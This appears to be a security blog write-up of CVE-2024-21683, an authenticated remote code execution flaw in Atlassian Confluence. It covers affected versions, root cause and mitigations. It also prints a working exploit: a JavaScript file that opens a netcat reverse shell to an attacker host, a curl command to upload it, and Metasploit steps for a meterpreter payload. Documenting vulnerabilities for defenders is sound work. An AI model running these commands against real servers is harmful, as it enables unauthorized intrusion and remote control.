Close Menu
    Ethical Hacking & Penetration Testing

    CVE-2024-21683 – Authenticated RCE via “Add a New Language” in Atlassian Confluence

    HackWatchitBy No Comments2 Mins Read
    My Journey with IR-200: Becoming an OffSec Certified Incident Responder (OSIR)

    CVE-2024-21683 is a critical Remote Code Execution (RCE) vulnerability affecting self-hosted Atlassian Confluence Data Center and Server instances (versions 5.2 through 8.9.0). It allows authenticated attackers with permissions to add code macro languages to upload malicious scripts, resulting in arbitrary code execution on the host system.

    • CVE ID: CVE-2024-21683
    • Severity: High
    • CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
    • EPSS Score: 93.98%
    • Published: May 21, 2024 
    • Affected Versions: Confluence Data Center ≤8.9.0; Server ≤8.5.8 LTS / ≤7.19.21 LTS
    • Fixed Versions: Data Center ≥ 8.9.1; Server ≥ 8.5.9 LTS or 7.19.22 LTS 

    The vulnerability stems from inadequate input validation in the “Add a new language” feature accessed via:

    POST /admin/plugins/newcode/addlanguage.action

    This endpoint expects a JavaScript language file, which is parsed by the RhinoLanguageParser. However, because the parser enables Java class access within the script, an attacker can inject malicious Java code (e.g., java.lang.Runtime.getRuntime().exec(…)) for RCE

    Conditions for Exploitation

    • Must have authenticated access to Confluence with privilege to add new macro languages
    • Instance must be on a vulnerable version (≤8.9.0 DC or ≤8.5.8/7.19.21 LTS Server)
    • Network access to the Confluence web interface

    Exploitation Steps (Manual & Metasploit)

     1. Create exploit.js:

    new java.lang.ProcessBuilder["(java.lang.String[])"](
  ["bash","-c","nc attacker-ip 4444 -e /bin/sh"]
).start();

    2. Send exploit:

    curl -X POST http://target:8090/admin/plugins/newcode/addlanguage.action \
  -F "atl_token=" \
  -F "languageFile=@exploit.js;filename=exploit.js" \
  -F "newLanguageName=evil"

    Upon upload, the code executes, spawning a reverse shell. POC link: Github

    Metasploit Module

    Rapid7 released a Metasploit module exploit/multi/http/atlassian_confluence_rce_cve_2024_21683. Here’s the usage flow:

    msf > use exploit/multi/http/atlassian_confluence_rce_cve_2024_21683
msf exploit(...) > set RHOSTS 10.10.10.5
msf exploit(...) > set admin_user admin
msf exploit(...) > set admin_pass admin
msf exploit(...) > set payload cmd/linux/http/x86/meterpreter_reverse_https
msf exploit(...) > exploit

    If credentials are valid and privileges suffice, the module will upload and execute the malicious script, yielding a shell 

    • Upgrade Confluence to fixed versions: DC ≥ 8.9.1; Server ≥ 8.5.9 LTS / 7.19.22 LTS
    • Restrict “Add language” privileges to trusted admins
    • Monitor logs for API calls to /admin/plugins/newcode/addlanguage.action
    • Immediate WAF rules: block unauthorized POSTs to this endpoint
    Share.

    Related Posts

    Comments are closed.